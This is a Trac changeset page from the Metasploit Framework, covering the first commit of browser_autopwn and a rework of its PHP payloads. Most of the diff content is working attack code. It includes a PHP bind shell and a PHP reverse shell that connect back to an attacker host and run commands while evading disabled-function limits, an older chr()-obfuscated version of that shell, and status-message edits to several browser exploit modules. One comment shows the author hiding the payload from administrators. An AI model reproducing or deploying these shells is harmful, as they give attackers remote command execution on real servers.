Navigation

← Previous Changeset
Next Changeset →

Changeset 5546

Timestamp:

06/30/08 20:44:56 (4 months ago)

Author:

egypt

Message:

initial commit of browser_autopwn;
revamp php payloads;
socks5 for IPv6 (untested)

Files:

framework3/trunk/lib/msf/core/exploit/http.rb (modified) (2 diffs)
framework3/trunk/lib/msf/core/payload/php.rb (added)
framework3/trunk/lib/rex/exploitation/obfuscatejs.rb (modified) (1 diff)
framework3/trunk/lib/rex/socket/comm/local.rb (modified) (6 diffs)
framework3/trunk/modules/auxiliary/server/browser_autopwn.rb (added)
framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (1 diff)
framework3/trunk/modules/encoders/php (added)
framework3/trunk/modules/encoders/php/base64.rb (added)
framework3/trunk/modules/exploits/multi/browser/firefox_queryinterface.rb (modified) (1 diff)
framework3/trunk/modules/exploits/osx/armle/safari_libtiff.rb (modified) (1 diff)
framework3/trunk/modules/exploits/osx/browser/safari_libtiff.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/apple_quicktime_rtsp.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/ms06_067_keyframe.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/novelliprint_getdriversettings.rb (modified) (1 diff)
framework3/trunk/modules/payloads/singles/php/bind_php.rb (modified) (5 diffs)
framework3/trunk/modules/payloads/singles/php/reverse_perl.rb (modified) (4 diffs)
framework3/trunk/modules/payloads/singles/php/reverse_php.rb (modified) (6 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/trunk/lib/msf/core/exploit/http.rb

r5429	r5546
444	444	end
445	445
	446
446	447	#
447	448	# Sends a 302 redirect relative to our base path
…	…
449	450	def send_local_redirect(cli, location)
450	451	send_redirect(cli, get_resource + location)
	452	end
	453
	454
	455	#
	456	# Sends a 404
	457	#
	458	def send_not_found(cli)
	459	resp_404 = create_response(404, 'Not Found')
	460	resp_404.body = %Q{
	461	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
	462	<html><head>
	463	<title>404 Not Found</title>
	464	</head><body>
	465	<h1>Not Found</h1>
	466	<p>The requested URL /404.html was not found on this server.</p>
	467	<hr>
	468	<address>Apache/2.2.9 (Unix) Server at #{datastore['LHOST']} Port #{datastore['SRVPORT']}</address>
	469	</body></html>
	470	}
	471
	472	cli.send_response(resp_404)
451	473	end
452	474

framework3/trunk/lib/rex/exploitation/obfuscatejs.rb

r5506	r5546
40	40	#
41	41	def sym(name)
42		@dynsym[name]
	42	@dynsym[name] \|\| name
43	43	end
44	44

framework3/trunk/lib/rex/socket/comm/local.rb

r5537	r5546
214	214	def self.proxy (sock, type, host, port)
215	215
	216	#$stdout.print("PROXY\n")
216	217	case type.downcase
217	218	when 'socks4'
…	…
219	220	size = sock.put(setup)
220	221	if (size != setup.length)
221		raise ArgumentError, "Wrote less data than expected to the socks proxy"
222		end
223
	222	raise ArgumentError, "Wrote less data than expected to the socks4 proxy"
	223	end
	224
224	225	begin
225	226	ret = sock.get_once(8, 30)
…	…
227	228	raise Rex::ConnectionRefused.new(host, port), caller
228	229	end
229
	230
230	231	if (ret.nil? or ret.length < 8)
231	232	raise ArgumentError, 'SOCKS4 server did not respond with a proper response'
…	…
235	236	end
236	237	when 'socks5'
237		~~# TODO: add dns lookups through socks5~~
238	238	auth_methods = [5,1,0].pack('CCC')
239	239	size = sock.put(auth_methods)
240	240	if (size != auth_methods.length)
241		raise ArgumentError, "Wrote less data than expected to the socks proxy"
	241	raise ArgumentError, "Wrote less data than expected to the socks5 proxy"
242	242	end
243	243	response = sock.get_once(2,30)
…	…
246	246	end
247	247
248		setup = [5,1,0,1].pack('CCCC') + Socket.gethostbyname(host)[3] + [port.to_i].pack('n')
	248	if (Rex::Socket.is_ipv4?(host))
	249	addr = Rex::Socket.gethostbyname(host)[3]
	250	setup = [5,1,0,1].pack('C4') + addr + [port.to_i].pack('n')
	251	elsif (Rex::Socket.support_ipv6? and Rex::Socket.is_ipv6?(host))
	252	# IPv6 stuff all untested
	253	addr = Rex::Socket.gethostbyname(host)[3]
	254	setup = [5,1,0,4].pack('C4') + addr + [port.to_i].pack('n')
	255	else
	256	# Then it must be a domain name.
	257	# Unfortunately, it looks like the host has always been
	258	# resolved by the time it gets here, so this code never runs.
	259	setup = [5,1,0,3].pack('C4') + [host.length].pack('C') + host + [port.to_i].pack('n')
	260	end
	261
249	262	size = sock.put(setup)
250	263	if (size != setup.length)
251		raise ArgumentError, "Wrote less data than expected to the socks proxy"
252		end
253
	264	raise ArgumentError, "Wrote less data than expected to the socks5 proxy"
	265	end
	266
254	267	begin
255	268	response = sock.get_once(10, 30)
…	…
257	270	raise Rex::ConnectionRefused.new(host, port), caller
258	271	end
259
260		if (response.nil? or response.length < 8)
	272
	273	if (response.nil? or response.length < 10)
261	274	raise ArgumentError, 'SOCKS5 server did not respond with a proper response'
262	275	end

framework3/trunk/modules/auxiliary/server/capture/http.rb

r5542	r5546
135	135	os_arch = 'armle'
136	136	when /Mac OS X/
137		os = 'Mac'
	137	os_name = 'Mac'
138	138	end
139	139

framework3/trunk/modules/exploits/multi/browser/firefox_queryinterface.rb

r4646	r5546
71	71	return if ((p = regenerate_payload(cli)) == nil)
72	72
73		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	73	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
74	74	send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
75	75	handler(cli)

framework3/trunk/modules/exploits/osx/armle/safari_libtiff.rb

r5151	r5546
86	86	t = target
87	87
88		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	88	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
89	89
90	90	# Transmit the compressed response to the client

framework3/trunk/modules/exploits/osx/browser/safari_libtiff.rb

r5186	r5546
74	74	t = target
75	75
76		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	76	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
77	77
78	78	# Transmit the compressed response to the client

framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb

r5497	r5546
291	291	return if ((p = regenerate_payload(cli)) == nil)
292	292
293		print_status("Sending ~~ANI file~~ to #{cli.peerhost}:#{cli.peerport}...")
	293	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
294	294
295	295	# Transmit the compressed response to the client

framework3/trunk/modules/exploits/windows/browser/apple_quicktime_rtsp.rb

r4645	r5546
67	67	content << "src=\"rtsp://#{cruft}:#{sploit}\" />\n"
68	68
69		print_status("Sending ~~exploit~~ to #{client.peerhost}:#{client.peerport}...")
	69	print_status("Sending #{self.name} to #{client.peerhost}:#{client.peerport}...")
70	70
71	71	send_response(client, content, { 'Content-Type' => 'text/html' })

framework3/trunk/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb

r4645	r5546
100	100	"</html>"
101	101
102		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	102	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
103	103
104	104	# Transmit the response to the client

framework3/trunk/modules/exploits/windows/browser/ms06_067_keyframe.rb

r5364	r5546
73	73	return if ((p = regenerate_payload(cli)) == nil)
74	74
75		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	75	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
76	76
77	77	# This is taken directly from Alex's exploit -- all credit goes to him.

framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb

r5496	r5546
130	130	content = Rex::Text.randomize_space(content)
131	131
132		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	132	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
133	133
134	134	# Transmit the response to the client

framework3/trunk/modules/exploits/windows/browser/novelliprint_getdriversettings.rb

r5533	r5546
107	107	content = Rex::Text.randomize_space(content)
108	108
109		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	109	print_status("Sending #{self.name}to #{cli.peerhost}:#{cli.peerport}...")
110	110
111	111	# Transmit the response to the client

framework3/trunk/modules/payloads/singles/php/bind_php.rb

r5138	r5546
12	12
13	13	require 'msf/core'
	14	require 'msf/core/payload/php'
14	15	require 'msf/core/handler/bind_tcp'
15	16	require 'msf/base/sessions/command_shell'
…	…
23	24
24	25	include Msf::Payload::Single
	26	include Msf::Payload::Php
25	27
26	28	def initialize(info = {})
…	…
29	31	'Version' => '$Revision$',
30	32	'Description' => 'Listen for a connection and spawn a command shell via php (persistent)',
31		'Author' => ['diaul <diaul@devilopers.org>',],
	33	'Author' => ['egypt', 'diaul <diaul@devilopers.org>',],
32	34	'License' => BSD_LICENSE,
33	35	'Platform' => 'php',
…	…
48	50	#
49	51	def php_bind_shell
	52
	53	dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
50	54	shell = <<-END_OF_PHP_CODE
51		error_reporting(E_ALL);
52
53		set_time_limit(0);
54		ob_implicit_flush();
	55	#{php_preamble({:disabled_varname => dis})}
	56	$port=#{datastore['LPORT']};
55	57
56		$port = #{datastore['LPORT']};
	58	$scl='socket_create_listen';
	59	if(is_callable($scl)&&!in_array($scl,#{dis})){
	60	$sock=$scl($port);
	61	}else{
	62	$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
	63	$ret=socket_bind($sock,0,$port);
	64	$ret=socket_listen($sock,5);
	65	}
	66	$msgsock=socket_accept($sock);
	67	socket_close($sock);
57	68
58		$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
59		$ret = socket_bind($sock, 0, $port);
60		$ret = socket_listen($sock, 5);
61		$msgsock = socket_accept($sock);
62
63		while (true)
	69	while(FALSE!==socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
64	70	{
65		$command = socket_read($msgsock, 2048, PHP_NORMAL_READ);
66		$output = shell_exec(substr($command, 0, -1));
67		socket_write($msgsock, $output, strlen($output));
68		}
69
70		socket_close($sock);
	71
	72	$c=socket_read($msgsock,2048,PHP_NORMAL_READ);
	73	if(FALSE===$c){break;}
	74	#{php_system_block({:cmd_varname=>"$c", :output_varname=>"$o", :disabled_varname => dis})}
	75	socket_write($msgsock,$o,strlen($o));
	76	}
	77	socket_close($msgsock);
71	78	END_OF_PHP_CODE
72	79
73	80	return shell
74
75	81	end
76
77	82
78	83	#
…	…
82	87	return super + php_bind_shell
83	88	end
84
85	89
86	90	end

framework3/trunk/modules/payloads/singles/php/reverse_perl.rb

r4419	r5546
1	1	##
2		# $Id:$
	2	# $Id$
3	3	##
4	4
…	…
12	12
13	13	require 'msf/core'
	14	require 'msf/core/payload/php'
14	15	require 'msf/core/handler/reverse_tcp'
15	16	require 'msf/base/sessions/command_shell'
…	…
23	24
24	25	include Msf::Payload::Single
	26	include Msf::Payload::Php
25	27
26	28	def initialize(info = {})
…	…
48	50	#
49	51	def generate
50		return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'))"
	52	buf = "#{php_preamble}"
	53	buf += "$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');"
	54	buf += "#{php_system_block({:cmd_varname=>"$c"})}"
	55	return super + buf
	56
51	57	end
52	58

framework3/trunk/modules/payloads/singles/php/reverse_php.rb

r5461	r5546
12	12
13	13	require 'msf/core'
	14	require 'msf/core/payload/php'
14	15	require 'msf/core/handler/reverse_tcp'
15	16	require 'msf/base/sessions/command_shell'
…	…
23	24
24	25	include Msf::Payload::Single
	26	include Msf::Payload::Php
25	27
26	28	def initialize(info = {})
…	…
45	47
46	48	#
47		~~# PHP Reverse Shell completely without quotes. Strings and regexes~~
48		~~# are replaced with chr() equivalents and the IP address to connect to is~~
49		~~# replaced with integer equivalent wrapped in long2ip().~~
50		#
51		~~# Attempts to make a connection back to the attacker using fsockopen or~~
52		~~# socket_create and associated functions. Then attempts to execute a~~
53		~~# system command with the following functions, in order:~~
54		~~# - shell_exec~~
55		~~# - passthru~~
56		~~# - system~~
57		~~# - exec~~
58		~~# - proc_open~~
59		~~# - popen~~
60		#
61	49	# Issues
62	50	# - Since each command is executed in a new shell, 'cd' does nothing.
…	…
65	53	# circumvent safe mode.
66	54	# - Should this add '2>&1' to the end of the executed command to avoid
67		# logging suspicious error messages?
	55	# logging suspicious error messages? I'm afraid this will break
	56	# the payload, especially on Windows, but I also don't like my tools
	57	# ratting on me to the administrator.
68	58	#
69	59	def php_reverse_shell
…	…
77	67	port = datastore['LPORT']
78	68	end
	69	exec_funcname = Rex::Text.rand_text_alpha(5)
79	70
80		#
81		~~# The regex looks like this unobfuscated:~~
82		~~# preg_replace('/[, ]+/', ',', $disabled);~~
83		#
84	71	shell=<<-END_OF_PHP_CODE
85	72	$ipaddr=long2ip(#{ipaddr});
86	73	$port=#{port};
87		$_=chr(95);$a=chr(97);$b=chr(98);$c=chr(99);$d=chr(100);$e=chr(101);
88		$f=chr(102);$h=chr(104);$i=chr(105);$k=chr(107);$l=chr(108);$m=chr(109);
89		$n=chr(110);$o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116);
90		$u=chr(117);$x=chr(120);$y=chr(121);
91		$disabled=@ini_get($d.$i.$s.$a.$b.$l.$e.$_.$f.$u.$n.$c.$t.$i.$o.$n.$s);
92		if(!empty($disabled)){
93		$disabled=preg_replace(chr(47).chr(91).chr(44).chr(32).chr(93).chr(43).chr(47),chr(44),$disabled);
94		$disabled=explode(chr(44),$disabled);
95		$disabled=array_map($t.$r.$i.$m,$disabled);
96		}else{
97		$disabled=array();
98		}
99		@set_time_limit(0);
100		@ignore_user_abort(1);
101		@ini_set($m.$a.$x.$_.$e.$x.$e.$c.$u.$t.$i.$o.$n.$_.$t.$i.$m.$e,0);
102		function myexec($cmd){
103		global$disabled,$_,$a,$c,$e,$h,$m,$n,$o,$p,$r,$s,$t,$u,$x,$y;
104		if(is_callable($s.$h.$e.$l.$l.$_.$e.$x.$e.$c)and!in_array($s.$h.$e.$l.$l.$_.$e.$x.$e.$c,$disabled)){
105		$output=shell_exec($cmd);
106		return$output;
107		}elseif(is_callable($p.$a.$s.$s.$t.$h.$r.$u)and!in_array($p.$a.$s.$s.$t.$h.$r.$u,$disabled)){
108		ob_start();
109		passthru($cmd);
110		$output=ob_get_contents();
111		ob_end_clean();
112		return$output;
113		}elseif(is_callable($s.$y.$s.$t.$e.$m)and!in_array($s.$y.$s.$t.$e.$m,$disabled)){
114		ob_start();
115		system($cmd);
116		$output=ob_get_contents();
117		ob_end_clean();
118		return$output;
119		}elseif(is_callable($e.$x.$e.$c)and!in_array($e.$x.$e.$c,$disabled)){
120		$output=array();
121		exec($cmd,$output);
122		$output=join(chr(10),$output).chr(10);
123		return$output;
124		}elseif(is_callable($p.$r.$o.$c.$_.$o.$p.$e.$n)and!in_array($p.$r.$o.$c.$_.$o.$p.$e.$n,$disabled)){
125		$handle=proc_open($cmd,array(array(pipe,r),array(pipe,w),array(pipe,w)),$pipes);
126		$output=NULL;
127		while(!feof($pipes[1])){
128		$output.=fread($pipes[1],1024);
129		}
130		@proc_close($handle);
131		return$output;
132		}elseif(is_callable($p.$o.$p.$e.$n)and!in_array($p.$o.$p.$e.$n,$disabled)){
133		$fp=popen($cmd,r);
134		$output=NULL;
135		if(is_resource($fp)){
136		while(!feof($fp)){
137		$output.=fread($fp,1024);
138		}
139		}
140		@pclose($fp);
141		return$output;
142		}else{
143		return false;
144		}
145		}
146		$command=NULL;
147		$nofuncs=$n.$o.chr(32).$e.$x.$e.$c.chr(32).$f.$u.$n.$c.$t.$i.$o.$n.$s.chr(32).chr(61).chr(40);
148		if(is_callable($f.$s.$o.$c.$k.$o.$p.$e.$n)and!in_array($f.$s.$o.$c.$k.$o.$p.$e.$n,$disabled)){
149		$sock=fsockopen($ipaddr,$port);
150		while($cmd=fread($sock,2048)){
151		$output=myexec(substr($cmd,0,-1));
152		if($output===false){
153		fwrite($sock,$nofuncs);
	74	#{php_preamble({:disabled_varname => "$dis"})}
	75
	76	if(!function_exists('myexec')){function myexec($c){
	77	global$dis;
	78	#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
	79	return$o;
	80	}}
	81	$nofuncs='no exec functions';
	82	if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
	83	$s=fsockopen($ipaddr,$port);
	84	while($c=fread($s,2048)){
	85	$out=myexec(substr($c,0,-1));
	86	if($out===false){
	87	fwrite($s,$nofuncs);
154	88	break;
155	89	}
156		fwrite($s~~ock,$outp~~ut);
	90	fwrite($s,$out);
157	91	}
158		fclose($s~~ock~~);
	92	fclose($s);
159	93	}else{
160		$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
161		socket_connect($sock,$ipaddr,$port);
162		while($cmd=socket_read($sock,2048)){
163		$output=myexec(substr($cmd,0,-1));
164		if($output===false){
165		socket_write($sock,$nofuncs);
	94	$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
	95	socket_connect($s,$ipaddr,$port);
	96	socket_write($s,"socket_create");
	97	while($c=socket_read($s,2048)){
	98	$out=myexec(substr($c,0,-1));
	99	if($out===false){
	100	socket_write($s,$nofuncs);
166	101	break;
167	102	}
168		socket_write($s~~ock,$output,strlen($outp~~ut));
	103	socket_write($s,$out,strlen($out));
169	104	}
170		socket_close($s~~ock~~);
	105	socket_close($s);
171	106	}
172	107	END_OF_PHP_CODE
173	108
174	109	# randomize the spaces a bit
175		shell.gsub!(/\s+/) { \|s\|
176		len = rand(5)+2
177		set = "\x09\x20\x0a"
178		buf = ''
179
180		while (buf.length < len)
181		buf << set[rand(set.length)].chr
182		end
183
184		buf
185		}
	110	Rex::Text.randomize_space(shell)
186	111
187	112	return shell
…	…
195	120	end
196	121
197
198	122	end
199	123

Navigation

Changeset 5546

Legend:

Download in other formats: